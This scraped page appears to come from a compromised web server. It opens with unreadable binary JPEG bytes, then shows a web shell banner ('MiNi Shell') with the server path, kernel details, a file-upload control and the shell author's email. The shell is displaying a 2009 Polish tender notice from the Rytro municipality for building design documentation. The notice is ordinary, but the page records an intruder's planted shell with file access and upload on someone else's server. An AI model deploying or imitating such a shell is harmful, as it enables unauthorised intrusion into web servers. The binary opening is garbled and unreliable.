JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090330/83792-N-2009.html

<p class="kh_header"><b>Rytro: OPRACOWANIE PEŁNOBRANŻOWEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ  DLA ZADANIA P.N. BUDOWA CENTRUM GMINY RYTRO</b><br>
<b>Numer ogłoszenia: 83792 - 2009; data zamieszczenia: 30.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rytro , 265, 33-343 Rytro, woj. małopolskie, tel. 018 446 90 40, faks 018 446 90 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rytro.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE PEŁNOBRANŻOWEJ DOKUMENTACJI PROJEKTOWO-KOSZTORYSOWEJ  DLA ZADANIA P.N. BUDOWA CENTRUM GMINY RYTRO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Opracowanie pełnobranżowej dokumentacji projektowo - kosztorysowej dla zadania pn. Budowa Centrum Gminy Rytro.

STAN ISTNIEJĄCY:
Przedmiot zamówienia dotyczy terenu o pow. 1,17 ha. Zamawiający dysponuje na cele budowlane działkami ewidencyjnymi o numerach 767/7;  767/8;  775/3;  775/7;  775/9;  777/1;  777/2;  845; 846; 847; 848  położonymi przy drodze powiatowej stanowiącej działkę ewidencyjną numer 834 w Rytrze. 

W planie zagospodarowania przestrzennego Gminy Rytro teren przeznaczony pod zainwestowanie oznaczony jest symbolem 11UC/UP co oznacza tereny usług komercyjnych - centrum usługowe gminy Obszar ten charakteryzuje sie następującymi problemami  zagospodarowania przestrzennego
i infrastruktury: niska atrakcyjność przestrzeni publicznej dla mieszkańców i turystów,  wysoki stopień degradacji estetycznej, niedostateczne wykorzystanie funkcji centrum jako miejsca usługowo-handlowego (z dostępnością obiektów infrastruktury społecznej)  niewystarczająca, niezmodernizowana infrastruktura techniczna, w tym: słaba dostępność nowoczesnych technologii,  istnienie barier architektonicznych dla niepełnosprawnych.

WYTYCZNE DO PROJEKTOWANIA:
Przedmiotem postępowania jest opracowanie pełnobranżowego projektu budowlanego i wykonawczego oraz kosztorysu inwestorskiego, przedmiarów, specyfikacji technicznych wykonania i odbioru robót, uzyskania wszelkich niezbędnych uzgodnień, pozwoleń, decyzji administracyjnych itp. koniecznych do uzyskania prawomocnego pozwolenia na budowę, a także ustanowienia nadzoru autorskiego nad realizacja dla zadania p.n. Budowa Centrum Gminy Rytro.

Przedmiot zamówienia obejmuje branże:
-architekturę i konstrukcje,
-projekt zagospodarowania działek,
-instalacje wewnętrzne: elektryczne, wodno-kanalizacyjne, gazowe wraz kotłownią, centralnego ogrzewania, wentylacji i klimatyzacji, teletechniczne, 
-instalacje zewnętrzne: przyłącz energetyczny, wodociągowy, kanalizacyjny, gazowy, teletechniczny,
-drogi dojazdowe i parkingi, chodniki, zieleń i ukształtowanie terenu,
-mała architektura

Zadanie w szczególności obejmuje:
- wykonanie map sytuacyjno - wysokościowych do celów projektowych,
- opracowanie projektów budowlanych dla wszystkich branż  -5 egz. w wersji papierowej + 1 egz. w wersji elektronicznej w formacie doc (WORD), xls ( EXCEL), PDF.
- opracowanie projektów  wykonawczych dla wszystkich branż  -5 egz. w wersji papierowej + 1 egz. . w wersji elektronicznej w formacie doc (WORD), xls ( EXCEL), PDF.
- opracowanie specyfikacji technicznej wykonania i odbioru robót - 5 egz. papierowych + 1egz.  w wersji elektronicznej, w formacie doc (WORD), xls ( EXCEL), PDF.
- opracowanie kosztorysu inwestorskiego w 1 egz. w wersji papierowej  + 1egz.  w wersji elektronicznej ( w formacie doc (WORD ) )
- opracowanie  przedmiaru robót w 5 egz. + 1egz.  w wersji elektronicznej,
- uzyskanie w imieniu Zamawiającego ostatecznego pozwolenia na budowę lub dokumentu równoważnego
- sprawowanie nadzoru autorskiego na etapie realizacji obiektów będącym przedmiotem opracowań projektowych

Zamawiający nie dostarcza żadnych materiałów z wyjątkiem:
- wyrysu i wypisu z planu zagospodarowania przestrzennego dla działek objętych opracowaniem;
- pełnomocnictwa do występowania w imieniu Zamawiającego w sprawach związanych z uzyskaniem koniecznych uzgodnień projektowych i na etapie postępowania administracyjnego związanego z uzyskaniem pozwolenia na budowę
Ciężar uzyskania wszelkich uzgodnień, decyzji, pozwoleń itp. spoczywał będzie na Projektancie.


Minimalne wymagania Zamawiającego  dotyczące układu funkcjonalnego obiektu(ów) kubaturowych zostały zawarte w SIWZ. 

Zamawiający zaleca, aby obiekt kubaturowy lub zespół obiektów kubaturowych w rzucie stanowiły kształt litery C  z wejściem od strony drogi powiatowej. 
Przy projektowaniu należy uwzględnić fakt, że realizacja Centrum Gminy Rytro przebiegać będzie etapami, zależnymi od możliwości finansowych Zamawiającego. Układ funkcjonalny należy tak rozwiązać, aby dla każdego sposobu użytkowania dało się wydzielić odrębne lokale/obiekty mogące samodzielnie funkcjonować, bez względu na postęp w realizacji obiektu dla pozostałych funkcji. Dopuszcza się wybudowanie kotłowni wspólnej dla wszystkich funkcji. W takim przypadku należy przewidzieć realizację kotłowni  w I etapie tak aby można było ją użytkować wraz z oddaniem do użytkowania pierwszego obiektu/ lokalu.
Działki ewidencyjne o numerach 845 oraz 848 wyłącza się spod zabudowy kubaturowej. 
W razie potrzeby mogą zostać wykorzystane na lokalizację parkingów lub miejsc postojowych.

Realizacja przedmiotu zamówienia odbywać się będzie etapami:

I etap - opracowanie ostatecznej koncepcji architektonicznej i koncepcji zagospodarowania terenu wraz z kosztami szacunkowymi inwestycji w oparciu o złożoną ofertę  i przedłożenie jej Zamawiającemu do zatwierdzenia

II etap - opracowanie projektu budowlanego i uzyskanie prawomocnego pozwolenia na budowę

III etap - opracowanie projektu wykonawczego, kosztorysu inwestorskiego, przedmiaru robót, specyfikacji technicznych wykonania i odbioru robót, 

IV etap -nadzór autorski

Przedmiot opracowania należy sporządzić zgodnie z obowiązującymi przepisami a w szczególności:

Ustawa z dnia 07.07.1994 r. - Prawo budowlane. Obwieszczenie Marszałka Sejmu RP z dnia 21.11.2003 r. Jednolity tekst Dz.U.03.207.2016 wraz z późniejszymi zmianami;

Rozporządzenie Ministra Infrastruktury z dnia 22 kwietnia 2005 r. zmieniające rozporządzenie 
w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 75, poz. 2075);
Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389);

Ustawa z dnia 27.04.2001 roku  Prawo Ochrony Środowiska  z późn. zm.
	
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu 
i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072) 

Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie. 

Rozporządzenie Ministra Infrastruktury z dnia 3.07.2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego. 

Rozporządzenie Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie. Dz.U.02.75.690.     Zmiany:    Dz.U.03.33.270, Dz.U.04.109.1156

Ustawa z 6 września 2001r. prawo farmaceutyczne (Dz.U. 08.45.271)

 Rozporządzenie ministra zdrowia z dnia 30 września 2002r. w sprawie szczegółowych wymogów, jakim powinien odpowiadać lokal apteki (Dz. U. 02.171.1395)

Rozporządzenie ministra zdrowia z dnia 26 września 2002r. w sprawie wykazu pomieszczeń wchodzących w skład powierzchni podstawowej i pomocniczej apteki (Dz. U. 02.161.1338)

Rozporządzenie ministra zdrowia z dnia 26 września 2002r. w sprawie danych wymaganych w opisie technicznym lokalu przeznaczonego na aptekę ogólnodostępną (Dz. U. 02.161.1337).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.24.00.00-2, 71.32.00.00-7, 71.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 7900 PLN.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki :

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Zamawiający uzna, że wykonawca spełnia ten warunek jeżeli:

a.	W ciągu 3 ostatnich lat, a jeżeli okres działalności jest krótszy - w tym okresie,  wykonał z należytą starannością przynajmniej 1 zamówienie, odpowiadające swoim rodzajem i wartością przedmiotowi niniejszego zamówienia;
  Za zamówienie odpowiadające przedmiotowi zamówienia swoim-swoją:
- rodzajem: uznaje się wykonanie dokumentacji projektowo-kosztorysowej, dotyczącej budowy, remontu lub modernizacji, na podstawie której wydano prawomocne pozwolenie na budowę dla obiektu użyteczności publicznej 
o kubaturze  nie mniejszej niż 6000m3
- wartością: uznaje się wykonanie dokumentacji projektowo-kosztorysowej 
o wartości nie mniejszej niż 60% ceny oferowanej w ofercie.

b.	Dysponuje co najmniej jedną osobą posiadającą uprawnienia  do wykonywania samodzielnych funkcji technicznych  w budownictwie w zakresie projektowania  dla wszystkich branż objętych niniejszym zamówieniem lub przedstawi zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.  
Zamawiający uzna, że oferent spełnia ten warunek jeżeli obrót roczny jego firmy za rok 2008  lub obrót za okres prowadzenia działalności w roku 2009  wyniósł nie mniej  niż 60% ceny oferowanej w ofercie.

4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

5.	Wnieśli wadium.

6.	Zapoznali się ze specyfikacją istotnych warunków zamówienia i przyjmują je bez zastrzeżeń.

7.	Przedstawi w ofercie wstępną koncepcję architektoniczną i koncepcję zagospodarowania terenu.

SPOSÓB OCENY SPEŁNIANIA WARUNKÓW
Ocenę spełniania warunków udziału w postępowaniu Zamawiający przeprowadzi w oparciu 
o dokumenty i oświadczenia jakie wykonawca ma obowiązek zawrzeć w ofercie.  Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Celem potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty lub poświadczone za zgodność z oryginałem ich kserokopie lub odpisy:

- formularz ofertowy ( wg załącznika nr 1do SIWZ);
- oświadczenie, o spełnianiu warunków udziału w postępowaniu i nie podlegają wykluczeniu 
z postępowania (załącznik  nr 2 do SIWZ) ;
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed  upływem terminu składania ofert;
- dowód wniesienia wadium;
- wykaz osób które będą wykonywać zamówienie  ze wskazaniem zakresu prac jakie będą wykonywać (załącznik  nr 4 do SIWZ) ;
- kopia uprawnień (dla wszystkich branż) i kopia dokumentu potwierdzającego przynależność do właściwego samorządu zawodowego osoby (osób),  która będzie wykonywać dokumentację  projektową; 
- wykaz wykonanych w okresie ostatnich 3-ech lat, a jeżeli okres działalności jest krótszy -  
w tym okresie, zamówień odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia, z podaniem ich wartości , kubatury oraz daty i miejsca wykonania (załącznik  nr 3 do SIWZ) ;
- wstępną koncepcję architektoniczną i koncepcję zagospodarowania terenu. 

Koncepcja musi zawierać co najmniej:
- część opisową,
- część graficzną: koncepcja zagospodarowania terenu, układ funkcjonalny pomieszczeń obrazujący sposób wydzielenia w obiekcie lokali/obiektów  o odrębnym sposobie użytkowania, proponowane elewacje wraz z kolorystyką obiektu, wizualizacje.

Koncepcja powinna zawierać prawidłowe zagospodarowanie terenu, związane z właściwym wkomponowaniem zaprojektowanej dodatkowej bryły budynku w istniejące i projektowane otoczenie. Poza tym projektant musi uwzględnić określone w programie funkcjonalnym potrzeby przez Urząd. Przyszły budynek Centrum będzie pełnił istotną rolę zarówno w strukturze przestrzennej i krajobrazie, jak również w życiu społecznym, konieczne będzie nadanie mu formy architektonicznej, odzwierciedlającej zarówno jego przyszłe znaczenie, jak również pokazujące aspiracje dynamicznie rozwijającego się ośrodka. 
Wskazane jest by zaprojektowany obiekt zawierał odniesienia do miejsca, w którym powstaje. Nowe rozwiązania funkcjonalno - przestrzenne winny stanowić poszanowanie istniejącej zabudowy, a jednocześnie wprowadzać zdecydowaną świeżość, innowacyjność.

Dokumenty o których mowa mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez dostawcę lub wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne. Zgodnie z przepisami art.24 ustawy Prawo zamówień publicznych spowoduje wykluczenie oferenta z dalszego postępowania.

O udzielenie przedmiotowego zamówienia wykonawcy mogą ubiegać się wspólnie.
W przypadku, o którym mowa wyżej, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
W przypadku złożenia oferty wspólnej przy sprawdzaniu spełnienia warunków wymaganych od oferentów w pkt. 1 i 4 sprawdzane będą indywidualnie dla każdego podmiotu składającego ofertę wspólną.

Dokumenty, o których mowa mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez dostawcę lub wykonawcę kserokopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób.
Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne. Zgodnie z przepisami art.24 ustawy Prawo zamówień publicznych spowoduje wykluczenie oferenta z dalszego postępowania.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, złoży dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, wraz z ich tłumaczeniem na język polski, potwierdzające odpowiednio, że:
- posiada uprawnienia do wykonywania do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 65</li>
<li>2 - Walory architektoniczno - przestrzenne - 15</li>
<li>3 - Rozwiązania funkcjonalno użytkowe - 15</li>
<li>4 - Koszt nadzoru autorskiego nad realizacją zadania - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rytro.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rytro, Rytro 265, 33-343 Rytro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 10:00, miejsce: URZĄD GMINY RYTRO
33-343 RYTRO, RYTRO  265
Sekretariat - pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com